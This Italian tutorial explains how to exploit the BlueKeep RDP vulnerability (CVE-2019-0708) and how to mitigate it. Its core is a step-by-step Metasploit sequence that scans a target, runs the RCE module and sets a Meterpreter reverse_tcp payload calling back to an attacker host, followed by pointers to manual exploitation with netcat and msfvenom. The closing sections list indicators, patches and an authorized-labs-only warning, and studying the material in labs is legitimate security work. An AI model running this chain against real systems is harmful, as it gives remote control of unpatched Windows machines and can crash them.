Tutorials

Bluekeep

Guida Approfondita allo Sfruttamento di BlueKeep CVE-2019-0708 ---

#exploitation#windows#rdp#metasploit

Guida Approfondita allo Sfruttamento di BlueKeep (CVE-2019-0708)


📄 Descrizione della Vulnerabilità

BlueKeep è una vulnerabilità critica di tipo Remote Code Execution (RCE) nel protocollo Remote Desktop Protocol (RDP) di Windows. È identificata con CVE-2019-0708 e affligge versioni legacy di Windows prive di autenticazione RDP, permettendo a un attaccante non autenticato di eseguire codice arbitrario.

Scoperta da Microsoft e resa pubblica a maggio 2019, la vulnerabilità è paragonabile a EternalBlue per pericolosità e impatto, ed è considerata wormable, cioè in grado di propagarsi autonomamente.


🚀 Sistemi Vulnerabili

  • Windows XP
  • Windows 7
  • Windows Server 2003
  • Windows Server 2008 / 2008 R2

Nota: solo versioni a 64-bit sono vulnerabili all'exploit RCE.


🔧 Verifica e Exploit con Metasploit

1. Avvio di Metasploit

bash
msfconsole

2. Ricerca moduli correlati

bash
search bluekeep

3. Verifica della vulnerabilità

bash
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <IP_TARGET>
run

Questo modulo esegue una scansione non invasiva per determinare se il sistema è vulnerabile.

4. Uso dell'exploit

bash
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

5. Configurazione essenziale

bash
set RHOST <IP_TARGET>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <IP_ATTACKER>
set TARGET <valore_compatibile>  # Target corretto in base alla versione e build del sistema

6. Settaggio del groom size

Il parametro GROOMSIZE è fondamentale:

bash
set GROOMSIZE <valore_ottimale>
Best practice: è consigliato iniziare con il valore di default. Se il target crasha, ridurre gradualmente.

7. Esecuzione dell'exploit

bash
exploit

Se la configurazione è corretta, si ottiene una sessione Meterpreter.


🔍 Riconoscimento e Mitigazioni

Indicatori di compromissione:

  • Apertura di TCP/3389 verso l'esterno
  • Modifica imprevista di servizi RDP
  • Crash improvviso del servizio "TermService"

Mitigazioni:

  • Applicare le patch di sicurezza Microsoft di maggio 2019
  • Disabilitare RDP se non necessario
  • Utilizzare VPN per accesso remoto sicuro
  • Bloccare la porta 3389 da fonti non autorizzate tramite firewall

🚫 Rischi e Considerazioni Etiche

  • L'exploit è estremamente instabile: può causare BSOD e crash del sistema.
  • L'uso è consentito esclusivamente in ambienti di test autorizzati.
  • L'uso improprio può comportare gravi conseguenze legali e danni ai sistemi.

📆 Approccio Alternativo: Manual Exploitation (senza Metasploit)

  • Utilizzo di PoC pubblici in C/C++
  • Setup manuale di listener con nc
  • Modifica del payload con msfvenom
Sconsigliato in ambiti non controllati a causa dell'alto rischio di instabilità

📊 Riepilogo Moduli Metasploit

ModuloFunzione
auxiliary/scanner/rdp/cve_2019_0708_bluekeepScanner passivo
exploit/windows/rdp/cve_2019_0708_bluekeep_rceExploit con RCE

✨ Suggerimenti Finali

  • Utilizza ambienti come HackTheBox, TryHackMe, o VulnHub per test controllati
  • Documenta sempre parametri efficaci per ogni tipo di sistema testato
  • Valuta i rischi prima di ogni esecuzione: anche in lab, un BSOD è dietro l'angolo

Fonti: